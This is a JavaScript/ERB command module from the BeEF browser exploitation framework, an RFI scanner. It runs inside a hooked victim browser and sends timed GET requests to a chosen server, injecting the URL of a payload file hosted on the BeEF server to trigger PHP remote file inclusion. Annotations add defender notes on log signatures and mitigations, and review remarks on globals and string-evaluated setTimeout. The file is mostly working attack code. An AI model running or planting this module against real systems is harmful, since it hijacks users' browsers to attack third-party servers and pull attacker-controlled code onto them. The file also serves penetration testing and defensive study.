beefproject
GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/rfi_scanner/command.js
//
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// RFI scanner command module: an ERB template rendered by the BeEF server and
// then executed in the hooked browser.
//
// What the code below does:
//   - Builds `target` from the templated rproto/rhost/rport/base_dir values.
//   - Takes each URI template from rfi.txt that contains the XXpathXX
//     placeholder, substitutes `payload_url` for the placeholder, and sends an
//     asynchronous GET for target + uri, one request every `wait` seconds.
//   - Reports "starting scan" and "scan complete" to the server through
//     beef.net.send; response bodies are only written to beef.debug.
//
// Defender notes:
//   - The requests are issued by the hooked browser, so the scanned host sees
//     the browser's address as the client, not the BeEF server's.
//   - In the target's access log this shows up as a run of GETs from one client
//     at a fixed interval, each carrying an absolute URL ending in
//     "/rfi_php_<command id>.txt?" wherever the template had XXpathXX. Request
//     values that hold absolute URLs are a practical WAF / log detection signal.
//   - The payload file name suggests PHP remote-include targets (assumption:
//     the payload itself is not part of this file). Keeping allow_url_include
//     disabled and restricting outbound HTTP from web servers are the usual
//     mitigations for that class of flaw.
beef.execute(function() {

  // Module options, substituted server-side when the template is rendered.
  var rproto = '<%= @rproto %>';
  var rhost = '<%= @rhost %>';
  var rport = '<%= @rport %>';
  var base_dir = '<%= @base_dir %>';
  // URL of a per-command .txt file on the BeEF server; the trailing '?' means
  // anything the target appends after it lands in the query string.
  var payload_url = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/rfi_php_<%= @command_id %>.txt?';
  // Base URL every request is sent to.
  var target = rproto + '://' + rhost + ':' + rport + base_dir;
  // Delay between requests in seconds; note this is a string, coerced to a
  // number by the multiplications further down.
  var wait = '<%= @wait %>';

  // Sends one GET built from a URI template.
  // NOTE(review): assigned without var/let/const, so get_url becomes a global
  // in the hooked page.
  get_url = function(uri) {
    try {
      var xhr = new XMLHttpRequest();
      // Every XXpathXX placeholder in the template becomes the payload URL.
      var rfi = uri.replace(/XXpathXX/g, payload_url);
      // Third argument true: the request is asynchronous.
      xhr.open('GET', target+rfi, true);
      // Empty handler: nothing is done on load.
      xhr.onload = function () {
      };
      xhr.onreadystatechange = function () {
        // Only a completed request with HTTP 200 is logged. For a cross-origin
        // target that does not allow CORS the browser reports status 0, so
        // nothing is logged here; the request has still been sent.
        if (xhr.readyState == 4 && xhr.status == 200) {
          beef.debug("[command #<%= @command_id %>] Response: " + xhr.response);
        }
      }
      xhr.send(null);
    } catch (e){
      // Exceptions raised while building or sending the request are logged and
      // swallowed, so one failure does not stop the remaining requests.
      beef.debug("[command #<%= @command_id %>] Something went wrong: " + e.message);
    }
  }

  // add scripts to queue
  // The Ruby inside the ERB tag runs on the server at render time. It reads
  // modules/exploits/rfi_scanner/rfi.txt and skips lines that start with '#',
  // lines for which chomp! returned nil (no line ending to strip), and lines
  // without the XXpathXX placeholder. Single quotes are backslash-escaped and
  // the remaining lines are emitted as a shuffled, comma-separated list of
  // single-quoted JS string literals, so the request order differs per render.
  var requests = new Array(
  <%=
    scripts = []
    File.open("#{$root_dir}/modules/exploits/rfi_scanner/rfi.txt", 'r') do |file_handle|
      file_handle.each_line do |line|
        uri = line.chomp!
        next if uri =~ /^#/
        next if uri.nil?
        next if uri !~ /XXpathXX/
        scripts << "'#{uri.gsub("'", "\\\\'")}'"
      end
    end
    scripts.shuffle.join(",\n")
  %>
  );

  // process queue
  beef.debug("[command #<%= @command_id %>] Starting RFI scan of "+target+" ("+requests.length+" URLs)");
  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan of "+target+" ("+requests.length+" URLs)");
  // Fallback deadline in seconds: one `wait` per queued request plus 10.
  var timeout = wait * requests.length + 10;
  // One request per tick, taken from the end of the list with pop(). The first
  // tick that finds the queue empty calls cleanup().
  var handle = setInterval(function() {
    if (requests.length > 0) {
      get_url(requests.pop());
    } else cleanup();
  }, wait*1000);

  // clean up
  // Stops the interval and reports completion once; setting handle to 0 turns
  // any later call into a no-op.
  // NOTE(review): assigned without a declaration, so cleanup is a global. The
  // string passed to setTimeout below is evaluated in global scope and depends
  // on that.
  cleanup = function() {
    if (handle) {
      beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");
      clearInterval(handle);
      handle = 0;
      beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
    }
  }
  // Fallback: run cleanup after `timeout` seconds whether or not the interval
  // has drained the queue. NOTE(review): a string argument to setTimeout is
  // evaluated like eval; a function reference is the usual form.
  setTimeout("cleanup();", timeout*1000);

});